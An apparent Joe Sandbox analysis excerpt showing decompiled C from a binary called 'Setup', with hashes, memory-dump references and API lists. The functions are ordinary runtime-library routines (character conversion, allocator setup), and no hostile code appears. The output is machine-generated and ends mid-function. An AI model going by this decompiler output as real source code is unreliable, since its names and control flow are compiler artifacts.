                                                                                                                                                              • Instruction ID: 338f5d2a9ba86dcfa8496b688ed2e06dce44ce7ba2f11e37412eb35ce0c1dd2d
                                                                                                                                                              • Opcode Fuzzy Hash: 4d35edf563f70e0af3eef84d4ba23a6c57d4ed4c1c8e931ed56335222567eb40
                                                                                                                                                              • Instruction Fuzzy Hash: 87415D70904249EFDF04DFA9D895BEEBBB4EB14314F10812EF412A7281DB785D05CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00465D42(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _t43;
                                                                                                                                                              				char _t46;
                                                                                                                                                              				signed int _t53;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                              				int _t57;
                                                                                                                                                              				int _t58;
                                                                                                                                                              				signed short* _t59;
                                                                                                                                                              				short* _t60;
                                                                                                                                                              				int _t65;
                                                                                                                                                              				char* _t73;
                                                                                                                                                              
                                                                                                                                                              				_t73 = _a8;
                                                                                                                                                              				if(_t73 == 0 || _a12 == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					if( *_t73 != 0) {
                                                                                                                                                              						E00451A3C( &_v20, __edi, _a16);
                                                                                                                                                              						_t43 = _v20;
                                                                                                                                                              						__eflags =  *(_t43 + 0x14);
                                                                                                                                                              						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                              							_t46 = E00460ACA( *_t73 & 0x000000ff,  &_v20);
                                                                                                                                                              							__eflags = _t46;
                                                                                                                                                              							if(_t46 == 0) {
                                                                                                                                                              								__eflags = _a4;
                                                                                                                                                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									L10:
                                                                                                                                                              									__eflags = _v8;
                                                                                                                                                              									if(_v8 != 0) {
                                                                                                                                                              										_t53 = _v12;
                                                                                                                                                              										_t11 = _t53 + 0x70;
                                                                                                                                                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                              										__eflags =  *_t11;
                                                                                                                                                              									}
                                                                                                                                                              									return 1;
                                                                                                                                                              								}
                                                                                                                                                              								L21:
                                                                                                                                                              								_t54 = E00454477(__eflags);
                                                                                                                                                              								 *_t54 = 0x2a;
                                                                                                                                                              								__eflags = _v8;
                                                                                                                                                              								if(_v8 != 0) {
                                                                                                                                                              									_t54 = _v12;
                                                                                                                                                              									_t33 = _t54 + 0x70;
                                                                                                                                                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                              									__eflags =  *_t33;
                                                                                                                                                              								}
                                                                                                                                                              								return _t54 | 0xffffffff;
                                                                                                                                                              							}
                                                                                                                                                              							_t56 = _v20;
                                                                                                                                                              							_t65 =  *(_t56 + 0xac);
                                                                                                                                                              							__eflags = _t65 - 1;
                                                                                                                                                              							if(_t65 <= 1) {
                                                                                                                                                              								L17:
                                                                                                                                                              								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                              									goto L21;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t73[1];
                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                              									goto L21;
                                                                                                                                                              								}
                                                                                                                                                              								L19:
                                                                                                                                                              								_t57 =  *(_t56 + 0xac);
                                                                                                                                                              								__eflags = _v8;
                                                                                                                                                              								if(_v8 == 0) {
                                                                                                                                                              									return _t57;
                                                                                                                                                              								}
                                                                                                                                                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                              								return _t57;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a12 - _t65;
                                                                                                                                                              							if(_a12 < _t65) {
                                                                                                                                                              								goto L17;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a4;
                                                                                                                                                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                              							_t56 = _v20;
                                                                                                                                                              							if(_t58 != 0) {
                                                                                                                                                              								goto L19;
                                                                                                                                                              							}
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              						_t59 = _a4;
                                                                                                                                                              						__eflags = _t59;
                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                              							 *_t59 =  *_t73 & 0x000000ff;
                                                                                                                                                              						}
                                                                                                                                                              						goto L10;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t60 = _a4;
                                                                                                                                                              						if(_t60 != 0) {
                                                                                                                                                              							 *_t60 = 0;
                                                                                                                                                              						}
                                                                                                                                                              						goto L5;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00465D76
                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00465DAA
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00451924,?,00000000,00000000,?,?,?,?,00451924,00000000,?), ref: 00465DDB
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00451924,00000001,00000000,00000000,?,?,?,?,00451924,00000000,?), ref: 00465E49
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                              • Opcode ID: 842950bc1bb2c9001aa3cd0f0948e4b1baaeb719dfad5a9d203bdd58c7e87718
                                                                                                                                                              • Instruction ID: 52dea748093019666df3ed059cbaa69503571aede2bbebb0e5ff6efe3d2f1e32
                                                                                                                                                              • Opcode Fuzzy Hash: 842950bc1bb2c9001aa3cd0f0948e4b1baaeb719dfad5a9d203bdd58c7e87718
                                                                                                                                                              • Instruction Fuzzy Hash: 4531A031A00656EFDF20DF64C888ABE3BB5EF01311F18856AE4A18B2E1E335DD51DB56
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0041E630(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x513830);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t49);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t30 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x18;
                                                                                                                                                              				_v44 = _t49;
                                                                                                                                                              				_v28 = E0041E7D0(_v44 + 1, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *((char*)(E0041D720(_v28))) = 1;
                                                                                                                                                              				 *((char*)(E0041CEF0(_v28))) = 0;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 8ce642c58801f047890592d3ad38a4102074216498c831a93635b213d1046d24
                                                                                                                                                              • Instruction ID: 3769a898c11e8c6f2bbe98c8fa6b9c4e404ce17e535a93d307b403eca069a5a8
                                                                                                                                                              • Opcode Fuzzy Hash: 8ce642c58801f047890592d3ad38a4102074216498c831a93635b213d1046d24
                                                                                                                                                              • Instruction Fuzzy Hash: E9315EB5D001089FDB04DF99C852BEFBBB9EF48318F14051EE505A7381D7396940CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0043A810(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x513490);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t49);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t30 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x18;
                                                                                                                                                              				_v44 = _t49;
                                                                                                                                                              				_v28 = E00433BF0(_v44 + 1, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *((char*)(E00436BA0(_v28))) = 1;
                                                                                                                                                              				 *((char*)(E004271F0(_v28))) = 0;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}

















                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 546a6a7146ac282cecb13664b6c39ebf8be5004f1d1b8b2efe67c34288c3041b
                                                                                                                                                              • Instruction ID: 267eeca0b7a615dd3572bc71c368de8326a6248929799914903cc305de613933
                                                                                                                                                              • Opcode Fuzzy Hash: 546a6a7146ac282cecb13664b6c39ebf8be5004f1d1b8b2efe67c34288c3041b
                                                                                                                                                              • Instruction Fuzzy Hash: 51315CB1D002099FDB04DF99D852BEFBBB8EF48318F14051EE505A7382D7396A40CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E004218E0(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5137c0);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t49);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t30 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x18;
                                                                                                                                                              				_v44 = _t49;
                                                                                                                                                              				_v28 = E00422100(_v44 + 1, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *((char*)(E00421D90(_v28))) = 1;
                                                                                                                                                              				 *((char*)(E004210A0(_v28))) = 0;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: a51f7e5378a0803056d5c623f8d65849aacbfa87ca64dff1ae1e2cf30a0d2efd
                                                                                                                                                              • Instruction ID: 05f35079934cdba28f038054f1e2dc774b529e5327ec5f593cc00cef1487bd56
                                                                                                                                                              • Opcode Fuzzy Hash: a51f7e5378a0803056d5c623f8d65849aacbfa87ca64dff1ae1e2cf30a0d2efd
                                                                                                                                                              • Instruction Fuzzy Hash: A8312FB1D001099FDB04DF99D852BEFBBB8EF48318F14051EE505A7381D7796A44CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0042B890(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5136f0);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t49);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t30 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x18;
                                                                                                                                                              				_v44 = _t49;
                                                                                                                                                              				_v28 = E0043FE80(_v44 + 1, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *((char*)(E0043B340(_v28))) = 1;
                                                                                                                                                              				 *((char*)(E0043F400(_v28))) = 0;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00421A50(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5137a0);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t49);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t30 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x18;
                                                                                                                                                              				_v44 = _t49;
                                                                                                                                                              				_v28 = E00421BC0(_v44 + 1, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *((char*)(E00420150(_v28))) = 1;
                                                                                                                                                              				 *((char*)(E00420160(_v28))) = 0;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E00419D50(char* _a4, int _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				short* _v28;
                                                                                                                                                              				int _v32;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				int _v44;
                                                                                                                                                              				short* _v48;
                                                                                                                                                              				int _v52;
                                                                                                                                                              				int _v56;
                                                                                                                                                              				short* _v60;
                                                                                                                                                              				signed int _t40;
                                                                                                                                                              				int _t43;
                                                                                                                                                              				short* _t48;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x513dc8);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t40 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t40 ^ _t70);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                              					_t43 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v32 = E00417320();
                                                                                                                                                              					E00413100( &_v40);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_v48 = 0;
                                                                                                                                                              					_v44 = MultiByteToWideChar(_v32, 0, _a4, _a8, 0, 0);
                                                                                                                                                              					_t48 = _v44;
                                                                                                                                                              					_v28 = _t48;
                                                                                                                                                              					if(_a8 == 0xffffffff) {
                                                                                                                                                              						_v28 = _v28 - 1;
                                                                                                                                                              					}
                                                                                                                                                              					__imp__#4(0, _v28);
                                                                                                                                                              					_v48 = _t48;
                                                                                                                                                              					if(_v48 == 0) {
                                                                                                                                                              						L8:
                                                                                                                                                              						_v60 = _v48;
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E00417350( &_v40);
                                                                                                                                                              						_t43 = _v60;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v52 = MultiByteToWideChar(_v32, 0, _a4, _a8, _v48, _v44);
                                                                                                                                                              						if(_v52 == _v44) {
                                                                                                                                                              							goto L8;
                                                                                                                                                              						} else {
                                                                                                                                                              							__imp__#6(_v48);
                                                                                                                                                              							_v56 = 0;
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E00417350( &_v40);
                                                                                                                                                              							_t43 = _v56;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t43;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,DDD124F9), ref: 00419DB8
                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,000000FF), ref: 00419DDC
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF), ref: 00419E01
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00419E16
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiStringWide$AllocFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 447844807-0
                                                                                                                                                              • Opcode ID: c8b932e8dd3b0843b89be5497f9439bbe8ea484dff45ff3cb6e23b36c1336f1f
                                                                                                                                                              • Instruction ID: 5e98daa09e5da11dd0cbceeb89d3eba70e89bc9115de2a4c1e012f7c7e63a4c1
                                                                                                                                                              • Opcode Fuzzy Hash: c8b932e8dd3b0843b89be5497f9439bbe8ea484dff45ff3cb6e23b36c1336f1f
                                                                                                                                                              • Instruction Fuzzy Hash: 7B31E971D00208EFDB04DFA9D995BEEBBB4EB48720F108619F925A7280D7356A85CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00408F50(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
